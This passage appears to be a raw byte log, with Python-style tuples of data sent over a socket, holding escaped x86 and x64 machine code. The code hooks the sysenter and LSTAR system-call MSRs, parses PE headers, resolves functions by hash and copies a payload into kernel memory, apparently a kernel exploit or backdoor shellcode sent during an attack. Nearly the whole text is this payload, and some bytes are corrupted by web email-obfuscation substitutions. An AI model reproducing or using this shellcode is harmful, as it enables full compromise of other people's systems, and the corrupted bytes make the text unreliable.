f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 12, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\